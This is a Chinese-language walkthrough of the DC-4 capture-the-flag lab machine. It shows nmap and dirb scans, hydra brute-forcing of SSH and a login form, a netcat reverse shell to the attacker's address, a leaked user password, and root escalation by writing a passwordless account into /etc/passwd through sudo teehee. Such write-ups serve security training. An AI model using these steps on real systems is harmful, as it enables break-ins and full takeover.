DC-4靶机

仅供个人娱乐

靶机信息

下载地址:http://www.five86.com/downloads/DC-4.zip

一、主机扫描

arp-scan -l

nmap -p 1-65535 -A -sV 192.168.17.130

二、信息收集

dirb http://192.168.17.130

三、漏洞查找和利用

爆破ssh

hydra -L /root/user.txt -P /root/rockyou.txt -t 5 ssh://192.168.17.130

字典设置太大了。

web页面

爆破

或者使用hydra 爆破密码

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.17.130 http-post-form "/login.php:username=^USER^ password=^PASS^:S=logout" -F

登录成功

信息收集

抓包

可以反弹shell命令:

nc -e /bin/bash 192.168.17.129 4444

python -c 'import pty;pty.spawn("/bin/bash")'

信息收集

复制 作为字典

ssh登录

查看信息

切换账户登录[charles:^xHhA&hvim0y]

查看用户权限发现,该用户可以以root权限免密码执行 /usr/bin/teehee

信息收集

第一种获取权限方法

添加账户

echo test::0:0:::/bin/bash | sudo teehee -a /etc/passwd

tail -n 5 /etc/passwd

su test



原文地址:https://www.cnblogs.com/bingtang123/p/12838408.html